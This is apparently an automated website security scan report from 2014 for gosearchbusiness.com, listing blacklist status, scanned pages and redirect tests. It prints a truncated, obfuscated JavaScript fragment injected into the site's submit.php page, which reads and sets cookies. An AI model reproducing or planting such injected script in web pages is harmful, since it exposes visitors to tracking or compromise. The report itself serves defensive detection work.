Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gosearchbusiness.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gosearchbusiness.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gosearchbusiness.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 11 Jun 2014 10:39:05 GMT Location: http://www.gosearchbusiness.com/ Server: Apache Vary: Accept-Encoding Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gosearchbusiness.com/ | 200 OK Content-Length: 13223 Content-Type: text/html | clean |
http://www.statcounter.com/counter/counter.js | 200 OK Content-Length: 9028 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://gosearchbusiness.com/submit.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 11 Jun 2014 10:39:08 GMT Location: http://www.gosearchbusiness.com/submit.php Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.gosearchbusiness.com/submit.php | 200 OK Content-Length: 30647 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy);var Qzecbe8 _uacct = "UA-967993-1"; urchinTracker(); Antivirus reports:
| ||
http://www.gosearchbusiness.com/index.php?p=d | 200 OK Content-Length: 23213 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/index.php?p=h | 200 OK Content-Length: 21434 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/test404page.js | 200 OK Content-Length: 13223 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/ | 200 OK Content-Length: 9065 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Art_History/ | 200 OK Content-Length: 9872 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Crafts/ | 200 OK Content-Length: 11496 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Film_and_Theater/ | 200 OK Content-Length: 14243 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Film_and_Theater/?p=2 | 200 OK Content-Length: 9718 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Literature/ | 200 OK Content-Length: 11236 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Music/ | 200 OK Content-Length: 15749 Content-Type: text/html | clean |
http://www.gosearchbusiness.com/Arts_and_Humanity/Music/?p=2 | 200 OK Content-Length: 15089 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gosearchbusiness.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 Jun 2014 10:39:05 GMT
Location: http://www.gosearchbusiness.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
GET / HTTP/1.1
Host: gosearchbusiness.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 11 Jun 2014 10:39:05 GMT
Location: http://www.gosearchbusiness.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gosearchbusiness.com
Referer: http://www.google.com/search?q=gosearchbusiness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gosearchbusiness.com
Referer: http://www.google.com/search?q=gosearchbusiness.com
Result:
The result is similar to the first query. There are no suspicious redirects found.